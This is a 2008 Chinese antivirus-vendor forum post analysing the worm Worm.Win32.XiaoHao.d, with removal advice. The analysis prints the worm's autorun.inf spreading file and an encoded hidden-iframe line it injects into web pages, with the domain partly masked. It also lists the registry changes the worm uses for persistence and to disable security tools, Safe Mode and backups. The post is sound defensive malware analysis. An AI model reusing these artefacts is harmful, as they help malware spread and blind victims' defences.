微点交流论坛

标题: 小浩变种Worm.Win32.XiaoHao.d [打印本页]

作者: pioneer 时间: 2008-6-23 18:46 标题: 小浩变种Worm.Win32.XiaoHao.d

病毒名称

Worm.Win32.XiaoHao.d

捕获时间

2008-06-23

病毒摘要

该样本是使用VC编写的蠕虫程序，由微点主动防御软件自动捕获，程序未加壳，长度为28,676字节，图标为

，病毒扩展名为exe，主要通过网页木马、文件捆绑、移动存储介质的方式传播，病毒主要感染文件。

感染对象

Windows 2000/Windows XP/Windows 2003

传播途径

网页木马、文件捆绑、移动存储介质

安全提示

　　已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”，请直接选择删除处理（如图1）；

　如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现" Worm.Win32.XiaoHao.d”，请直接选择删除（如图2）。

对于未使用微点主动防御软件的用户，微点反病毒专家建议：
1、不要在不明站点下载非官方版本的软件进行安装，避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放，具体操作步骤：开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新，及时打好漏洞补丁。

[ Last edited by pioneer on 2008-6-23 at 19:08 ]

作者: pioneer 时间: 2008-6-23 18:50
病毒分析

该样本程序被执行后，拷贝自身分别到目录%SystemRoot%\system32和%SystemRoot%\system32\dllcache下，分别重命名为xpserve.exe、lsoss.exe；在%SystemRoot%\system32\drivers目录下释放驱动文件KPDrv.sys；调用SCM写注册表，将驱动程序KPDrv.sys注册成名为KPDrvLN的服务，通过相关API函数启动被注册的服务以加载驱动程序，加载成功后删除驱动文件和所注册的服务；

Quote:

项：HKLM\SYSTEM\CurrentControlSet\Services\KPDrvLN\
键值：DisplayName
指向数据：KPDrvLN
项：HKLM\SYSTEM\CurrentControlSet\Services\KPDrvLN\
键值：ImagePath
指向文件：\??\%SystemRoot%\system32\drivers\KPDrv.sys
项：HKLM\SYSTEM\CurrentControlSet\Services\KPDrvLN\
键值：Start
指向数据：03

修改如下注册表健值实现；枚举窗口查找窗口名中是否存在如下字符，如果存在则通过发送WM_CLOSE、WM_DESTROY消息将窗口关闭；

Quote:

注册表
任务管理
卫士
防火墙
微点
瑞星
江民
金山
墙
网镖
马
毒
升
360

修改如下注册表健值实现病毒随系统一起启动、删除Windows更新选项、禁止使用DOS程序、禁止执行实模式的DOS程序、禁止使用注册表编辑器、屏蔽[Internet选项]的[安全]选项卡、删除IE工具栏中媒体栏命令、隐藏病毒文件、使[Internet选项]变为灰色；删除安全模式对应的注册表健值，使用户不能通过安全模式来修复系统；删除映象劫持、计算机管理CLSID、注册表信息文件所对应的注册表健值；

枚举磁盘查找所有文件类型判断扩展名为HTM、htm、html、asp、aspx、php、jsp的文件时，在文件内插入<iframe src=http://%77%77%77%2E%6B%61%6E%67%6B%2E%63%6E/%61%***%68%74%6D width=0 height=0></iframe>，解密后为http://www.k***k.cn/a2.htm；枚举磁盘删除文件扩展名为GHO或gho的文件，删除主文件名中含有字符串cmd且扩展名为exe的文件，感染扩展名为exe文件；之后每隔350000ms访问网站http://%77%77%77%2E%6B%61%6E%67%6B%2E***6E/%61%33%2E%68%74%6D，解密后为http://www.***k.cn/a3.htm；遍历盘符在各分区和移动存储介质中释放病毒文件net.exe和autorun.inf,使用Windows自动播放功能来传播病毒。

Quote:

项：HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
健值：xpserve
指向数据：%SystemRoot%\system32\xpserve.exe

项：HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
健值：System
指向数据：%SystemRoot%\system32\dllcache\lsoss.exe

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
健值：NoCommon Groups
指向数据：01

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOld-App\Disabled\
健值：Disabled
指向数据：01

项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOld-App\Disabled\
健值：NoRealMode
指向数据：01

项:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
健值：DisableRegistryTools
指向数据：01

项：HKCU\Software\Policies\Microsoft\Internet Explorer\Control Pane\
健值：SecurityTab
指向数据：01

项：HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\
健值：No_LaunchMediaBar
指向数据：00

项：HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
健值：Hidden
指向数据：01

项：HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
健值：ShowSuperHidden
指向数据：01

项：HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\
健值：NoBrowserOptions
指向数据：01

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}
HKCR\regfile\shell\open\command

autorun.inf文件内容如下:

Quote:

[Autorun]
open=net.exe
shell\open=打开(&O)
shell\open\Command=net.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=net.exe
shellexecute=net.exe
shell\Auto\command=net.exe

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn